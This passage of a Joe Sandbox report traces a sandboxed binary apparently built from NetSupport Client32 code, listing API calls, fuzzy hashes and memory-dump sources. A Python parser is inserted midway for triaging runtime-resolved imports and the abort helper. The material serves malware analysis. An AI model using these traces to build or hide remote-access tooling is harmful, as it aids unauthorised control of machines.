                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3832070631-0
                                                                                    • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                    • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                    • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                    • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                    APIs
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,420B7E12,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                      • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                    • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                    • API String ID: 3780373956-3165951319
                                                                                    • Opcode ID: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                    • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                    • Opcode Fuzzy Hash: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                    • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
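The entry above (LoadLibraryA("Kernel32.dll"), GetProcAddress(..., "WTSGetActiveConsoleSessionId"), SetLastError(0x78), FreeLibrary) is the report's concrete evidence for the "dynamically determine API calls" signature, and the repeated "Part of subcall function 11029450" lines across entries point at one shared helper that shows a "Client32" message box and calls ExitProcess. The Python below is an added example, not code from the Joe Sandbox report or from NetSupport: it parses the per-function "APIs" listing in the line format printed on this page and pulls out those triage facts (runtime-resolved exports, the shared abort helper and its caption, and the name of a literal SetLastError code; 0x78 is ERROR_CALL_NOT_IMPLEMENTED in winerror.h). The two sample inputs are the API lines of this page's own entries, embedded as constructed input; the assumed line format is the one visible here (optional subcall prefix, Api.MODULE, optional parenthesised arguments, then "ref: <hex>").

```python
"""Parse the per-function 'APIs' listing of a Joe Sandbox execution-graph entry
and extract what a triager wants from it: exports resolved at runtime, the
shared abort helper, and the meaning of any literal SetLastError value."""
import re
from dataclasses import dataclass
from typing import Optional

# One API line as printed in the report (format assumed from this page), e.g.
#   • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
#   • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")
# Win32 error codes this script can name (values from winerror.h).
WIN32_ERRORS = {0x78: "ERROR_CALL_NOT_IMPLEMENTED"}
_LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple                 # argument strings exactly as printed
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address for indented 'Part of subcall' lines


def parse_api_block(text: str) -> list:
    """Turn the 'APIs' block of one entry into ApiCall records; section labels
    such as 'Strings' do not match the pattern and are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def _is_literal(arg: str) -> bool:
    # The plugin prints unresolved values as '?' and resolved integers as 8 hex
    # digits; anything else is a string constant recovered from the binary.
    return arg != "?" and not _HEX32.match(arg)


def dynamic_imports(calls: list) -> list:
    """(library, export) pairs resolved at runtime, in direct-call order; the
    library is the most recent LoadLibrary/GetModuleHandle string argument."""
    pairs, current_lib = [], None
    for c in (c for c in calls if c.subcall_of is None):
        if c.api in _LOADERS and c.args and _is_literal(c.args[0]):
            current_lib = c.args[0]
        elif c.api == "GetProcAddress" and len(c.args) == 2 and _is_literal(c.args[1]):
            pairs.append((current_lib, c.args[1]))
    return pairs


def abort_helpers(calls: list) -> dict:
    """Subcall address -> MessageBoxA caption for helpers that show a box and
    then call ExitProcess, i.e. the fatal-error routine shared by many entries."""
    apis, caption = {}, {}
    for c in calls:
        if c.subcall_of is None:
            continue
        apis.setdefault(c.subcall_of, set()).add(c.api)
        if c.api == "MessageBoxA" and len(c.args) == 4 and _is_literal(c.args[2]):
            caption[c.subcall_of] = c.args[2]
    return {addr: caption.get(addr) for addr, seen in apis.items()
            if {"MessageBoxA", "ExitProcess"} <= seen}


def explained_last_errors(calls: list) -> list:
    """(call site, code, name) for every SetLastError with a literal code."""
    out = []
    for c in calls:
        if c.api == "SetLastError" and c.args and _HEX32.match(c.args[0]):
            code = int(c.args[0], 16)
            out.append((c.ref, code, WIN32_ERRORS.get(code, "unknown")))
    return out


# Constructed input: the API lines of two entries copied from this report.
SAMPLE_RESOLVE = """\
APIs
• LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
• GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
• SetLastError.KERNEL32(00000078), ref: 110575F4
• FreeLibrary.KERNEL32(00000000), ref: 110575FF
Strings
"""
SAMPLE_MENU = """\
APIs
• LoadMenuA.USER32(00000000,00002EF9), ref: 1100329D
• GetSubMenu.USER32(00000000,00000000), ref: 110032C3
• GetMenuItemCount.USER32(00000000), ref: 110032E7
• DestroyMenu.USER32(00000000), ref: 110032F9
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
"""
```

Running the parser over SAMPLE_RESOLVE yields the pair ("Kernel32.dll", "WTSGetActiveConsoleSessionId") and names the SetLastError code at 110575F4 as ERROR_CALL_NOT_IMPLEMENTED, which is the error a compatibility shim sets when the export is missing from an older kernel32; over SAMPLE_MENU it yields {0x11029450: "Client32"}, the caption of the shared abort helper. The "Client32" caption is itself a useful string indicator, since it is the name NetSupport's client component uses for its error dialogs in this report.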
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,420B7E12,75BF7CB0,75BF7AA0,?,75BF7CB0,75BF7AA0), ref: 11071554
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11071568
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110716E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                    • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                    • API String ID: 624642848-3840833929
                                                                                    • Opcode ID: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                    • Instruction ID: f6d3c874c1d1c48a5cbc4b1d223e4c094ec3a892b4c0f1e6412567ed65325da8
                                                                                    • Opcode Fuzzy Hash: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                    • Instruction Fuzzy Hash: F061C775E04285DFD715CF68C480FAABBF6FB08318F0985A9E8968B2C1D774E944CB94
                                                                                    APIs
                                                                                      • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                      • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                      • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                      • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                      • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 3136964118-2830328467
                                                                                    • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                    • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
                                                                                    • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                    • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 111370A6
                                                                                    • _free.LIBCMT ref: 111370DD
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • _free.LIBCMT ref: 1113716D
                                                                                      • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                    • _free.LIBCMT ref: 1113713E
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                    • String ID: *HelpReqServer$Client
                                                                                    • API String ID: 1390041139-3616015116
                                                                                    • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                    • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                    • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                    • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                    APIs
                                                                                    • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                      • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                    • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                    • MessageBeep.USER32(00000000), ref: 11143427
                                                                                    • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                    • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                    • String ID: 1000,50
                                                                                    • API String ID: 3904670044-1941404556
                                                                                    • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                    • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                    • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                    • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: ..\CTL32\configplus.cpp$result <= buflen
                                                                                    • API String ID: 2111968516-413741496
                                                                                    • Opcode ID: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                    • Instruction ID: 66cd83cde6406eed73dadf9a29febb3e9e016d9ffe8428f4573ae4edc325b04e
                                                                                    • Opcode Fuzzy Hash: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                    • Instruction Fuzzy Hash: 8E21DB75E041669BC301CF389C84DEE77ED9FC5369B14C251FDA69B685E631E904C390
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(75BF7AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                    • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                      • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                    • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                    • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                    • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                    • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3235510773-0
                                                                                    • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                    • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                    • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                    • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
APIs
• InterlockedDecrement.KERNEL32(?), ref: 1100B280
• EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
• EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8
  • Part of subcall function 1100A1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1EE
  • Part of subcall function 1100A1D0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A218
  • Part of subcall function 1100A1D0: GetLastError.KERNEL32 ref: 1100A220
  • Part of subcall function 1100A1D0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A234
  • Part of subcall function 1100A1D0: CloseHandle.KERNEL32(00000000), ref: 1100A23B
• waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
• LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
• _free.LIBCMT ref: 1100B2F8
• _free.LIBCMT ref: 1100B2FE
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
• String ID:
• API String ID: 705253285-0
• Opcode ID: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
• Instruction ID: 1708c8f2d16fe6171f6400e7ced1c046c931d624ac1b1599b235a4591b72ed62
• Opcode Fuzzy Hash: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
• Instruction Fuzzy Hash: 06117075904719ABE711CE70CC88BEFB3ECEB48399F000529FA6656144D774B545CB61
APIs
• _memset.LIBCMT ref: 1101D0FE
• LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
• LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
• RegisterClassExA.USER32(00000030), ref: 1101D181
• GetLastError.KERNEL32 ref: 1101D187
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Load$ClassCursorErrorIconLastRegister_memset
• String ID: 0
• API String ID: 430917334-4108050209
• Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
• Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
• Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
• Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
APIs
• LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
• GetSubMenu.USER32(00000000,00000000), ref: 11003343
• DestroyMenu.USER32(00000000), ref: 11003372
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
• Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
• Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
• Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
APIs
• OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
• CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
